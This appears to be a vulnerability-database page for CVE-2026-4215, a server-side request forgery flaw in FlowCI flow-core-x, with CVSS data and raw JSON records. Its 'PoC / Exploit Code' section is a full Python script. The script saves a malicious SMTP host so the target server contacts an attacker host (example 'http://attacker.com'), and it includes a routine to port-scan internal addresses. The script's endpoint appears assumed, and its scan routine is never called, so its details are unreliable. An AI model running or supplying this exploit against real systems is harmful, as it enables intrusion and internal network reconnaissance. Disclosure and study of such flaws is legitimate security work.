Security Vulnerability Report
中文
CVE-2026-4215 CVSS 6.3 MEDIUM

CVE-2026-4215

Published: 2026-03-16 14:20:09
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A security flaw has been discovered in FlowCI flow-core-x up to 1.23.01. The impacted element is the function Save of the file core/src/main/java/com/flowci/core/config/service/ConfigServiceImpl.java of the component SMTP Host Handler. The manipulation results in server-side request forgery. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

FlowCI flow-core-x <= 1.23.01

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-4215 PoC - SSRF in FlowCI flow-core-x SMTP Host Handler # Target: FlowCI flow-core-x <= 1.23.01 def exploit_ssrf(target_url, attacker_server): """ Exploit SSRF vulnerability in ConfigServiceImpl.java Save function Args: target_url: Base URL of FlowCI application attacker_server: Attacker's controlled server to receive SSRF requests """ # Construct malicious SMTP host configuration # The Save function in ConfigServiceImpl.java doesn't properly validate # the SMTP host input, allowing attacker to specify arbitrary URLs/IPs smtp_config = { "host": attacker_server, # Attacker-controlled server "port": 80, "type": "smtp" } # Endpoint for saving SMTP configuration endpoint = f"{target_url}/api/config/smtp" try: # Send malicious configuration response = requests.post( endpoint, json=smtp_config, timeout=10, verify=False ) print(f"[*] Request sent to {endpoint}") print(f"[*] Response status: {response.status_code}") if response.status_code == 200: print("[+] Malicious SMTP host configuration saved successfully") print(f"[*] Server will now make requests to: {attacker_server}") return True else: print(f"[-] Failed to save configuration: {response.text}") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False def internal_port_scan(target_url): """ Use SSRF to perform internal port scanning """ internal_ips = ["127.0.0.1", "192.168.1.1", "10.0.0.1"] ports = [22, 80, 443, 3306, 6379, 8080] for ip in internal_ips: for port in ports: smtp_config = { "host": f"{ip}:{port}", "port": port, "type": "smtp" } endpoint = f"{target_url}/api/config/smtp" try: response = requests.post( endpoint, json=smtp_config, timeout=5, verify=False ) # If response time is short, port might be open print(f"[*] Scanned {ip}:{port}") except: pass if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2026-4215-poc.py <target_url> <attacker_server>") print("Example: python cve-2026-4215-poc.py http://flowci.local http://attacker.com") sys.exit(1) target = sys.argv[1] attacker = sys.argv[2] print("[*] CVE-2026-4215 PoC - FlowCI SSRF") print(f"[*] Target: {target}") print(f"[*] Attacker server: {attacker}") exploit_ssrf(target, attacker)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4215", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:20:08.510", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in FlowCI flow-core-x up to 1.23.01. The impacted element is the function Save of the file core/src/main/java/com/flowci/core/config/service/ConfigServiceImpl.java of the component SMTP Host Handler. The manipulation results in server-side request forgery. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Una falla de seguridad ha sido descubierta en FlowCI flow-core-x hasta 1.23.01. El elemento afectado es la función Save del archivo core/src/main/java/com/flowci/core/config/service/ConfigServiceImpl.java del componente SMTP Host Gestor. La manipulación resulta en falsificación de petición del lado del servidor. El ataque puede ser realizado desde remoto. El exploit ha sido liberado al público y puede ser utilizado para ataques. El proveedor fue contactado tempranamente sobre esta divulgación pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/fakebug111/my_public_bug/blob/main/issus01.md", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.351139", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351139", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.770491", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.